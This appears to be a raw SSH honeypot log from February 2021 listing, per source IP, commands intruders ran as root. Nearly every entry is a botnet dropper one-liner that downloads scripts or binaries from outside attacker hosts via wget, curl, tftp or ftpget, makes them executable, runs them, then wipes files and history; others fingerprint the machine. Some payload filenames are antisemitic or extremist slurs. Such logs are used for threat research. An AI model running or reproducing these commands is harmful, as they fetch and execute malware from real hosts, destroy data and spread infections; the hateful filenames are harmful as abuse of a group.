cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://176.123.7.10/fuckjewishpeople.sh
chmod 777 fuckjewishpeople.sh
sh fuckjewishpeople.sh
tftp 176.123.7.10 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 176.123.7.10
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 159.89.20.95 7-Feb-2021 07:08:23 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://23.94.99.40/ISIS.sh; chmod 777 *; sh ISIS.sh; tftp -g 23.94.99.40 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://23.94.99.40/ISIS.sh
chmod 777 *
sh ISIS.sh
tftp -g 23.94.99.40 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 51.210.138.178 7-Feb-2021 12:52:09 ssh2 root
Exec uname -a ; nproc
uname -a
nproc

From 68.183.66.44 7-Feb-2021 17:59:03 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://51.75.190.159/sh; curl -O http://51.75.190.159/sh; chmod 777 sh; sh sh; tftp 51.75.190.159 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 51.75.190.159; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 51.75.190.159 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://51.75.190.159/sh
curl -O http://51.75.190.159/sh
chmod 777 sh
sh sh
tftp 51.75.190.159 -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g 51.75.190.159
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 51.75.190.159 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 95.19.252.139 7-Feb-2021 18:07:56 ssh2 root
ps -a
nproc
cat etc/issue
cat /etc/issue
wget
cd .ssh
ls -a
wget heya.at.ua/new/gs.tgz
wget http://rekon.altervista.org/irc/bnc.tgz
exit

From 174.138.12.229 7-Feb-2021 19:13:19 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.239.147.105/incubusdream.sh; chmod 777 incubusdream.sh; sh incubusdream.sh; tftp 193.239.147.105 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 193.239.147.105; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://193.239.147.105/incubusdream.sh
chmod 777 incubusdream.sh
sh incubusdream.sh
tftp 193.239.147.105 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 193.239.147.105
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 146.255.75.178 8-Feb-2021 01:06:08 ssh2 root
w
cd /home
ls
ps x
ls
nporc
lscpu
cd /tmp
cd .ssh
ls
ls -a
cd .prgssh3
ls
exit

From 206.189.58.182 8-Feb-2021 06:18:26 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://163.172.234.205/sh; curl -O http://163.172.234.205/sh; chmod 777 sh; sh sh; tftp 163.172.234.205 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 163.172.234.205; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 163.172.234.205 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://163.172.234.205/sh
curl -O http://163.172.234.205/sh
chmod 777 sh
sh sh
tftp 163.172.234.205 -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g 163.172.234.205
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 163.172.234.205 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 95.19.252.139 8-Feb-2021 13:34:40 ssh2 root
ls
./test.pl
ps -x
cd /home
ls
ls -a
ls
exit

From 128.199.203.183 8-Feb-2021 18:09:23 ssh2 root
Exec uname -a 
uname -a

From 64.225.105.68 8-Feb-2021 20:41:11 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://163.172.234.199/fuckjewishpeople.sh; chmod 777 fuckjewishpeople.sh; sh fuckjewishpeople.sh; tftp 163.172.234.199 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 163.172.234.199; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://163.172.234.199/fuckjewishpeople.sh
chmod 777 fuckjewishpeople.sh
sh fuckjewishpeople.sh
tftp 163.172.234.199 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 163.172.234.199
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 142.44.214.91 9-Feb-2021 04:34:34 ssh2 root
Exec uname -a;cd /tmp;dget http://mexalz.cf/xshieldd ;wget http://mexalz.cf/xshieldd;fetch http://mexalz.cf/xshieldd;curl -O http://mexalz.cf/xshieldd && perl xshieldd && rm -rf xshield*
uname -a
cd /tmp
dget http://mexalz.cf/xshieldd
wget http://mexalz.cf/xshieldd
fetch http://mexalz.cf/xshieldd
curl -O http://mexalz.cf/xshieldd
perl xshieldd
rm -rf xshield*

From 163.172.234.215 9-Feb-2021 12:21:49 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://163.172.234.212/sh; curl -O http://163.172.234.212/sh; chmod 777 sh; sh sh; tftp 163.172.234.212 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 163.172.234.212; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 163.172.234.212 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://163.172.234.212/sh
curl -O http://163.172.234.212/sh
chmod 777 sh
sh sh
tftp 163.172.234.212 -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g 163.172.234.212
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 163.172.234.212 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 159.203.190.66 9-Feb-2021 18:19:36 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://159.65.222.61/sh; curl -O http://159.65.222.61/sh; chmod 777 sh; sh sh; tftp 159.65.222.61 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 159.65.222.61; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 159.65.222.61 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://159.65.222.61/sh
curl -O http://159.65.222.61/sh
chmod 777 sh
sh sh
tftp 159.65.222.61 -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g 159.65.222.61
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 159.65.222.61 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 167.99.32.203 10-Feb-2021 07:15:31 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.239.243.27/projectdream.sh; chmod 777 projectdream.sh; sh projectdream.sh; tftp 185.239.243.27 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 185.239.243.27; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://185.239.243.27/projectdream.sh
chmod 777 projectdream.sh
sh projectdream.sh
tftp 185.239.243.27 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 185.239.243.27
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 45.89.124.122 10-Feb-2021 19:57:33 ssh2 root
Exec wget http://107.174.217.134/bins/Simps.x86_64;chmod 777 Simps.x86_64;./Simps.x86_64
wget http://107.174.217.134/bins/Simps.x86_64
chmod 777 Simps.x86_64
./Simps.x86_64

From 40.74.139.130 10-Feb-2021 20:28:51 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.41.24.30/bins.sh; chmod +x bins.sh; sh bins.sh; tftp 104.41.24.30 -c get tftp1.sh; chmod +x tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 104.41.24.30; chmod +x tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 104.41.24.30 ftp1.sh ftp1.sh; sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://104.41.24.30/bins.sh
chmod +x bins.sh
sh bins.sh
tftp 104.41.24.30 -c get tftp1.sh
chmod +x tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 104.41.24.30
chmod +x tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 104.41.24.30 ftp1.sh ftp1.sh
sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh

From 37.46.150.142 10-Feb-2021 23:05:10 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.239.147.190/shell; chmod 777 shell; sh shell; tftp 193.239.147.190 -c get tftp; chmod 777 tftp; sh tftp; tftp -r tftp -g 193.239.147.190; chmod 777 tftp; sh tftp; rm -rf shell tftp; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://193.239.147.190/shell
chmod 777 shell
sh shell
tftp 193.239.147.190 -c get tftp
chmod 777 tftp
sh tftp
tftp -r tftp -g 193.239.147.190
chmod 777 tftp
sh tftp
rm -rf shell tftp
rm -rf *

From 175.27.187.38 11-Feb-2021 04:52:04 ssh2 root
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime
cat /proc/uptime

From 144.126.222.106 12-Feb-2021 05:33:58 ssh2 root
Exec cat /etc/issue ; wget http://143.110.156.240/x86;cat x86 >fairyfuck;chmod 777 *;./fairyfuck;history -c
cat /etc/issue
wget http://143.110.156.240/x86
cat x86 >fairyfuck
chmod 777 *
./fairyfuck
history -c

From 188.166.87.163 12-Feb-2021 18:18:32 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.130.138.70/sh; curl -O http://45.130.138.70/sh; chmod 777 sh; sh sh; tftp 45.130.138.70 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 45.130.138.70; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 45.130.138.70 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.130.138.70/sh
curl -O http://45.130.138.70/sh
chmod 777 sh
sh sh
tftp 45.130.138.70 -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g 45.130.138.70
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 45.130.138.70 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 188.166.87.163 13-Feb-2021 04:57:52 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.130.138.67/sh; curl -O http://45.130.138.67/sh; chmod 777 sh; sh sh; tftp 45.130.138.67 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 45.130.138.67; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 45.130.138.67 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.130.138.67/sh
curl -O http://45.130.138.67/sh
chmod 777 sh
sh sh
tftp 45.130.138.67 -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g 45.130.138.67
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 45.130.138.67 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 45.145.185.222 13-Feb-2021 17:22:22 ssh2 root
Exec lscpu ; nproc ; wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
lscpu
nproc
wget nasapaul.com/ninfo
chmod +x *
./ninfo

From 51.161.31.150 14-Feb-2021 08:32:33 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://venus.lol/Pemex.sh; curl -O http://venus.lol/Pemex.sh; chmod 777 Pemex.sh; sh Pemex.sh; tftp venus.lol -c get Pemex.sh; chmod 777 Pemex.sh; sh Pemex.sh; tftp -r Pemex2.sh -g venus.lol; chmod 777 Pemex2.sh; sh Pemex2.sh; ftpget -v -u anonymous -p anonymous -P 21 venus.lol Pemex1.sh Pemex1.sh; sh Pemex1.sh; rm -rf Pemex.sh Pemex.sh Pemex2.sh Pemex1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://venus.lol/Pemex.sh
curl -O http://venus.lol/Pemex.sh
chmod 777 Pemex.sh
sh Pemex.sh
tftp venus.lol -c get Pemex.sh
chmod 777 Pemex.sh
sh Pemex.sh
tftp -r Pemex2.sh -g venus.lol
chmod 777 Pemex2.sh
sh Pemex2.sh
ftpget -v -u anonymous -p anonymous -P 21 venus.lol Pemex1.sh Pemex1.sh
sh Pemex1.sh
rm -rf Pemex.sh Pemex.sh Pemex2.sh Pemex1.sh
rm -rf *

From 167.99.32.92 14-Feb-2021 14:02:30 ssh2 root
Exec lscpu ; nproc ; wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo ; rm -rf *
lscpu
nproc
wget nasapaul.com/ninfo
chmod +x *
./ninfo
rm -rf *

From 207.154.245.175 14-Feb-2021 18:59:28 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.130.138.67/oniondream.sh; chmod 777 oniondream.sh; sh oniondream.sh; tftp 45.130.138.67 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.130.138.67; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.130.138.67/oniondream.sh
chmod 777 oniondream.sh
sh oniondream.sh
tftp 45.130.138.67 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 45.130.138.67
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 77.83.247.58 14-Feb-2021 23:18:13 ssh2 root
Exec cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget http://45.141.59.213/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 45.141.59.213 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.141.59.213; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp cd /var/run cd /mnt cd /root cd /
wget http://45.141.59.213/bins.sh
chmod 777 bins.sh
sh bins.sh
tftp 45.141.59.213 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 45.141.59.213
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 185.117.119.235 15-Feb-2021 17:54:25 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.145.185.100/LpKDJb/pxSd.x86;curl -O http://45.145.185.100/LpKDJb/pxSd.x86; chmod 777 pxSd.x86; ./pxSd.x86 x86_64; tftp 45.145.185.100 -c get pxSd.x86; chmod 777 pxSd.x86; ./pxSd.x86 x86_64; tftp -r pxSd.x86 -g 45.145.185.100; chmod 777 pxSd.x86; ./pxSd.x86 x86_64; ftpget -v -u anonymous -p anonymous -P 21 45.145.185.100 pxSd.x86 pxSd.x86; ./pxSd.x86 x86_64; rm -rf pxSd.x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.145.185.100/LpKDJb/pxSd.x86
curl -O http://45.145.185.100/LpKDJb/pxSd.x86
chmod 777 pxSd.x86
./pxSd.x86 x86_64
tftp 45.145.185.100 -c get pxSd.x86
chmod 777 pxSd.x86
./pxSd.x86 x86_64
tftp -r pxSd.x86 -g 45.145.185.100
chmod 777 pxSd.x86
./pxSd.x86 x86_64
ftpget -v -u anonymous -p anonymous -P 21 45.145.185.100 pxSd.x86 pxSd.x86
./pxSd.x86 x86_64
rm -rf pxSd.x86
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.145.185.100/LpKDJb/pxSd.x86;curl -O http://45.145.185.100/LpKDJb/pxSd.x86; chmod 777 pxSd.x86; ./pxSd.x86 x86_64; tftp 45.145.185.100 -c get pxSd.x86; chmod 777 pxSd.x86; ./pxSd.x86 x86_64; tftp -r pxSd.x86 -g 45.145.185.100; chmod 777 pxSd.x86; ./pxSd.x86 x86_64; ftpget -v -u anonymous -p anonymous -P 21 45.145.185.100 pxSd.x86 pxSd.x86; ./pxSd.x86 x86_64; rm -rf pxSd.x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.145.185.100/LpKDJb/pxSd.x86
curl -O http://45.145.185.100/LpKDJb/pxSd.x86
chmod 777 pxSd.x86
./pxSd.x86 x86_64
tftp 45.145.185.100 -c get pxSd.x86
chmod 777 pxSd.x86
./pxSd.x86 x86_64
tftp -r pxSd.x86 -g 45.145.185.100
chmod 777 pxSd.x86
./pxSd.x86 x86_64
ftpget -v -u anonymous -p anonymous -P 21 45.145.185.100 pxSd.x86 pxSd.x86
./pxSd.x86 x86_64
rm -rf pxSd.x86

From 185.117.119.235 15-Feb-2021 18:04:14 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.145.185.100/LpKDJb/pxSd.x86;curl -O http://45.145.185.100/LpKDJb/pxSd.x86; chmod 777 pxSd.x86; ./pxSd.x86 x86_64; tftp 45.145.185.100 -c get pxSd.x86; chmod 777 pxSd.x86; ./pxSd.x86 x86_64; tftp -r pxSd.x86 -g 45.145.185.100; chmod 777 pxSd.x86; ./pxSd.x86 x86_64; ftpget -v -u anonymous -p anonymous -P 21 45.145.185.100 pxSd.x86 pxSd.x86; ./pxSd.x86 x86_64; rm -rf pxSd.x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.145.185.100/LpKDJb/pxSd.x86
curl -O http://45.145.185.100/LpKDJb/pxSd.x86
chmod 777 pxSd.x86
./pxSd.x86 x86_64
tftp 45.145.185.100 -c get pxSd.x86
chmod 777 pxSd.x86
./pxSd.x86 x86_64
tftp -r pxSd.x86 -g 45.145.185.100
chmod 777 pxSd.x86
./pxSd.x86 x86_64
ftpget -v -u anonymous -p anonymous -P 21 45.145.185.100 pxSd.x86 pxSd.x86
./pxSd.x86 x86_64
rm -rf pxSd.x86

From 152.89.239.71 15-Feb-2021 19:57:31 ssh2 root
Exec curl -s -O http://45.84.196.157/pi && perl pi && rm -rf pi
curl -s -O http://45.84.196.157/pi
perl pi
rm -rf pi

From 119.196.147.88 16-Feb-2021 14:36:36 ssh2 root
Exec echo "{
  \"info\":\"$(uname -a 2>/dev/null)\",
  \"os\":\"$(lsb_release -ds 2>/dev/null)\",
  \"machine\":\"$(uname -m 2>/dev/null)\",
  \"curl\":\"$(which curl 2>/dev/null)\",
  \"wget\":\"$(which wget 2>/dev/null)\",
  \"adb\":\"$(which adb 2>/dev/null)\",
  \"iptables\":\"$(which iptables 2>/dev/null)\",
  \"ipset\":\"$(which ipset 2>/dev/null)\"
}"
echo "{ \"info\":\"$(uname -a 2>/dev/null)\", \"os\":\"$(lsb_release -ds 2>/dev/null)\", \"machine\":\"$(uname -m 2>/dev/null)\", \"curl\":\"$(which curl 2>/dev/null)\", \"wget\":\"$(which wget 2>/dev/null)\", \"adb\":\"$(which adb 2>/dev/null)\", \"iptables\":\"$(which iptables 2>/dev/null)\", \"ipset\":\"$(which ipset 2>/dev/null)\" }"
Exec echo "{
  \"info\":\"$(uname -a 2>/dev/null)\",
  \"os\":\"$(lsb_release -ds 2>/dev/null)\",
  \"machine\":\"$(uname -m 2>/dev/null)\",
  \"curl\":\"$(which curl 2>/dev/null)\",
  \"wget\":\"$(which wget 2>/dev/null)\",
  \"adb\":\"$(which adb 2>/dev/null)\",
  \"iptables\":\"$(which iptables 2>/dev/null)\",
  \"ipset\":\"$(which ipset 2>/dev/null)\"
}"
echo "{ \"info\":\"$(uname -a 2>/dev/null)\", \"os\":\"$(lsb_release -ds 2>/dev/null)\", \"machine\":\"$(uname -m 2>/dev/null)\", \"curl\":\"$(which curl 2>/dev/null)\", \"wget\":\"$(which wget 2>/dev/null)\", \"adb\":\"$(which adb 2>/dev/null)\", \"iptables\":\"$(which iptables 2>/dev/null)\", \"ipset\":\"$(which ipset 2>/dev/null)\" }"
Exec echo "{
  \"info\":\"$(uname -a 2>/dev/null)\",
  \"os\":\"$(lsb_release -ds 2>/dev/null)\",
  \"machine\":\"$(uname -m 2>/dev/null)\",
  \"curl\":\"$(which curl 2>/dev/null)\",
  \"wget\":\"$(which wget 2>/dev/null)\",
  \"adb\":\"$(which adb 2>/dev/null)\",
  \"iptables\":\"$(which iptables 2>/dev/null)\",
  \"ipset\":\"$(which ipset 2>/dev/null)\"
}"
echo "{ \"info\":\"$(uname -a 2>/dev/null)\", \"os\":\"$(lsb_release -ds 2>/dev/null)\", \"machine\":\"$(uname -m 2>/dev/null)\", \"curl\":\"$(which curl 2>/dev/null)\", \"wget\":\"$(which wget 2>/dev/null)\", \"adb\":\"$(which adb 2>/dev/null)\", \"iptables\":\"$(which iptables 2>/dev/null)\", \"ipset\":\"$(which ipset 2>/dev/null)\" }"

From 14.46.7.72 16-Feb-2021 19:57:29 ssh2 root
Exec echo "{
  \"info\":\"$(uname -a 2>/dev/null)\",
  \"os\":\"$(lsb_release -ds 2>/dev/null)\",
  \"machine\":\"$(uname -m 2>/dev/null)\",
  \"curl\":\"$(which curl 2>/dev/null)\",
  \"wget\":\"$(which wget 2>/dev/null)\",
  \"adb\":\"$(which adb 2>/dev/null)\",
  \"iptables\":\"$(which iptables 2>/dev/null)\",
  \"ipset\":\"$(which ipset 2>/dev/null)\"
}"
echo "{ \"info\":\"$(uname -a 2>/dev/null)\", \"os\":\"$(lsb_release -ds 2>/dev/null)\", \"machine\":\"$(uname -m 2>/dev/null)\", \"curl\":\"$(which curl 2>/dev/null)\", \"wget\":\"$(which wget 2>/dev/null)\", \"adb\":\"$(which adb 2>/dev/null)\", \"iptables\":\"$(which iptables 2>/dev/null)\", \"ipset\":\"$(which ipset 2>/dev/null)\" }"
Exec echo "{
  \"info\":\"$(uname -a 2>/dev/null)\",
  \"os\":\"$(lsb_release -ds 2>/dev/null)\",
  \"machine\":\"$(uname -m 2>/dev/null)\",
  \"curl\":\"$(which curl 2>/dev/null)\",
  \"wget\":\"$(which wget 2>/dev/null)\",
  \"adb\":\"$(which adb 2>/dev/null)\",
  \"iptables\":\"$(which iptables 2>/dev/null)\",
  \"ipset\":\"$(which ipset 2>/dev/null)\"
}"
echo "{ \"info\":\"$(uname -a 2>/dev/null)\", \"os\":\"$(lsb_release -ds 2>/dev/null)\", \"machine\":\"$(uname -m 2>/dev/null)\", \"curl\":\"$(which curl 2>/dev/null)\", \"wget\":\"$(which wget 2>/dev/null)\", \"adb\":\"$(which adb 2>/dev/null)\", \"iptables\":\"$(which iptables 2>/dev/null)\", \"ipset\":\"$(which ipset 2>/dev/null)\" }"

From 191.16.95.231 16-Feb-2021 19:57:53 ssh2 root
Exec echo "{
  \"info\":\"$(uname -a 2>/dev/null)\",
  \"os\":\"$(lsb_release -ds 2>/dev/null)\",
  \"machine\":\"$(uname -m 2>/dev/null)\",
  \"curl\":\"$(which curl 2>/dev/null)\",
  \"wget\":\"$(which wget 2>/dev/null)\",
  \"adb\":\"$(which adb 2>/dev/null)\",
  \"iptables\":\"$(which iptables 2>/dev/null)\",
  \"ipset\":\"$(which ipset 2>/dev/null)\"
}"
echo "{ \"info\":\"$(uname -a 2>/dev/null)\", \"os\":\"$(lsb_release -ds 2>/dev/null)\", \"machine\":\"$(uname -m 2>/dev/null)\", \"curl\":\"$(which curl 2>/dev/null)\", \"wget\":\"$(which wget 2>/dev/null)\", \"adb\":\"$(which adb 2>/dev/null)\", \"iptables\":\"$(which iptables 2>/dev/null)\", \"ipset\":\"$(which ipset 2>/dev/null)\" }"

From 45.95.169.237 17-Feb-2021 21:22:58 ssh2 root
Exec cd /tmp; wget http://194.62.6.48/ssh.sh; curl -O http://194.62.6.48/ssh.sh; chmod 777 ssh.sh; sh ssh.sh; tftp 194.62.6.48 -c get ssh1.sh; chmod 777 ssh1.sh; sh ssh1.sh; tftp -r ssh2.sh -g 194.62.6.48; chmod 777 ssh2.sh; sh ssh2.sh; rm -rf ssh.sh ssh1.sh ssh2.sh
cd /tmp
wget http://194.62.6.48/ssh.sh
curl -O http://194.62.6.48/ssh.sh
chmod 777 ssh.sh
sh ssh.sh
tftp 194.62.6.48 -c get ssh1.sh
chmod 777 ssh1.sh
sh ssh1.sh
tftp -r ssh2.sh -g 194.62.6.48
chmod 777 ssh2.sh
sh ssh2.sh
rm -rf ssh.sh ssh1.sh ssh2.sh

From 51.161.31.150 17-Feb-2021 22:19:35 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://51.161.31.150/huh.sh; curl -O http://51.161.31.150/huh.sh; chmod 777 huh.sh; sh huh.sh; tftp 51.161.31.150 -c get huh.sh; chmod 777 huh.sh; sh huh.sh; tftp -r huh2.sh -g 51.161.31.150; chmod 777 huh2.sh; sh huh2.sh; ftpget -v -u anonymous -p anonymous -P 21 51.161.31.150 huh1.sh huh1.sh; sh huh1.sh; rm -rf huh.sh huh.sh huh2.sh huh1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://51.161.31.150/huh.sh
curl -O http://51.161.31.150/huh.sh
chmod 777 huh.sh
sh huh.sh
tftp 51.161.31.150 -c get huh.sh
chmod 777 huh.sh
sh huh.sh
tftp -r huh2.sh -g 51.161.31.150
chmod 777 huh2.sh
sh huh2.sh
ftpget -v -u anonymous -p anonymous -P 21 51.161.31.150 huh1.sh huh1.sh
sh huh1.sh
rm -rf huh.sh huh.sh huh2.sh huh1.sh
rm -rf *

From 199.223.254.107 18-Feb-2021 04:25:23 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://45.15.143.152/xxxbins.sh; chmod 777 xxxbins.sh; sh xxxbins.sh; tftp 45.15.143.152 -c get xxxtftp1.sh; chmod 777 xxxtftp1.sh; sh xxxtftp1.sh; tftp -r xxxtftp2.sh -g 45.15.143.152; chmod 777 xxxtftp2.sh; sh xxxtftp2.sh; rm -rf xxxbins.sh xxxtftp1.sh xxxtftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://45.15.143.152/xxxbins.sh
chmod 777 xxxbins.sh
sh xxxbins.sh
tftp 45.15.143.152 -c get xxxtftp1.sh
chmod 777 xxxtftp1.sh
sh xxxtftp1.sh
tftp -r xxxtftp2.sh -g 45.15.143.152
chmod 777 xxxtftp2.sh
sh xxxtftp2.sh
rm -rf xxxbins.sh xxxtftp1.sh xxxtftp2.sh
rm -rf *

From 207.154.223.53 18-Feb-2021 08:33:22 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://195.58.38.73/GoOgle.sh; chmod 777 GoOgle.sh; sh GoOgle.sh; tftp 195.58.38.73 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 195.58.38.73; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 195.58.38.73 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf GoOgle.sh tftp1.sh tftp2.sh ftp1.sh;rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://195.58.38.73/GoOgle.sh
chmod 777 GoOgle.sh
sh GoOgle.sh
tftp 195.58.38.73 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 195.58.38.73
chmod 777 tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 195.58.38.73 ftp1.sh ftp1.sh
sh ftp1.sh
rm -rf GoOgle.sh tftp1.sh tftp2.sh ftp1.sh
rm -rf *

From 211.159.154.136 18-Feb-2021 23:04:50 ssh2 root
Exec nproc;uname -a
nproc
uname -a
Exec nproc;uname -a
nproc
uname -a

From 161.97.112.251 22-Feb-2021 18:22:20 ssh2 root
Exec wget http://209.141.48.55/x86; curl -O http://209.141.48.55/x86; cat x86 > 0x3a13a141f0c; chmod +x *; ./0x3a13a141f0c Exploit.x86
wget http://209.141.48.55/x86
curl -O http://209.141.48.55/x86
cat x86 > 0x3a13a141f0c
chmod +x *
./0x3a13a141f0c Exploit.x86

From 161.35.218.118 23-Feb-2021 00:56:44 ssh2 root
